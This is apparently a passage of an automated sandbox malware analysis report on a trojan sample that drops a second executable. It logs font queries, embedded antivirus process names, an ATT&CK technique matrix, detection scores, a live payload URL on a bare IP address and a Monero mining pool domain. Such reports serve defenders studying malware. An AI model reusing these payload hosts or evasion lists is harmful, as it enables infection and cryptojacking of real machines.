Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: tmp70CEtmp.exe	Binary or memory string: bdagent.exe
Source: tmp70CEtmp.exe	Binary or memory string: cmdagent.exe
Source: tmp70CEtmp.exe	Binary or memory string: vsserv.exe
Source: tmp70CEtmp.exe	Binary or memory string: cfp.exe
Source: tmp70CEtmp.exe	Binary or memory string: avp.exe
Source: tmp70CEtmp.exe	Binary or memory string: a2start.exe
Source: tmp70CEtmp.exe	Binary or memory string: a2guard.exe
Source: tmp70CEtmp.exe	Binary or memory string: a2service.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Startup Items1	Startup Items1	Masquerading11	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting11	Registry Run Keys / Startup Folder2	Process Injection622	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Registry Run Keys / Startup Folder2	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection622	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting11	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing31	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LZF5sOWnss.exe	59%	Virustotal		Browse
LZF5sOWnss.exe	29%	Metadefender		Browse
LZF5sOWnss.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Dothetuk
LZF5sOWnss.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\LKBNMTFJgl\csrss	24%	ReversingLabs	Win32.Trojan.Pwsx
C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	24%	ReversingLabs	Win32.Trojan.Pwsx

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.2.tmp70CEtmp.exe.400000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.5.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
0.2.LZF5sOWnss.exe.2c54b50.5.unpack	100%	Avira	HEUR/AGEN.1110362	Download File
14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
0.2.LZF5sOWnss.exe.2bfea70.2.unpack	100%	Avira	HEUR/AGEN.1110362	Download File
14.2.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
13.2.tmp70CEtmp.exe.3510000.3.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://45.144.225.135/notepad.exeB	0%	Avira URL Cloud	safe
https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity	0%	Avira URL Cloud	safe
http://45.144.225.135/notepad.exe	15%	Virustotal		Browse
http://45.144.225.135/notepad.exe	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/jp/G	0%	Avira URL Cloud	safe
http://45.144.225.135/config.txtX	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/5.	0%	Avira URL Cloud	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0DN	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.urwpp.de/	0%	Avira URL Cloud	safe
http://www.urwpp.deod	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/(	0%	URL Reputation	safe
http://www.carterandcone.comV	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/sDN	0%	Avira URL Cloud	safe
http://www.carterandcone.comtra	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.tiro.comslnt	0%	URL Reputation	safe
http://45.144.225.135/config.txt	0%	Avira URL Cloud	safe
http://www.carterandcone.comica	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/N	0%	URL Reputation	safe
http://www.carterandcone.comcom	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.urwpp.dees	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/v	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.carterandcone.comIta	0%	Avira URL Cloud	safe
http://45.144.Hbs	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/v	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/s	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0-d	0%	Avira URL Cloud	safe
https://xmrig.com/docs/algorithms	0%	URL Reputation	safe
http://45.144.225.135/config.txtes	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/oby	0%	Avira URL Cloud	safe
https://RtlGetVersionntdll.dll	0%	Avira URL Cloud	safe
http://45.144.225.135	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xmr-us-east1.nanopool.org	144.217.14.139	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.144.225.135/notepad.exe	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://45.144.225.135/config.txt	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.144.225.135/notepad.exeB	tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity	notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/G	tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/contact/	svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	false		high
http://45.144.225.135/config.txtX	tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	tmp70CEtmp.exe, 00000004.00000003.710633941.0000000005920000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	tmp70CEtmp.exe, 00000004.00000003.721477633.0000000005920000.00000004.00000001.sdmp, tmp70CEtmp.exe, 00000004.00000003.714807293.000000000591E000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/5.	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com	tmp70CEtmp.exe, 00000004.00000003.710523038.000000000591F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0DN	tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/-cz	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersR	tmp70CEtmp.exe, 00000004.00000003.715192479.000000000591F000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	tmp70CEtmp.exe, 00000004.00000003.718697602.0000000005920000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlv-se4	tmp70CEtmp.exe, 00000004.00000003.716356964.0000000005920000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersers;	tmp70CEtmp.exe, 00000004.00000003.716512937.0000000005920000.00000004.00000001.sdmp	false		high
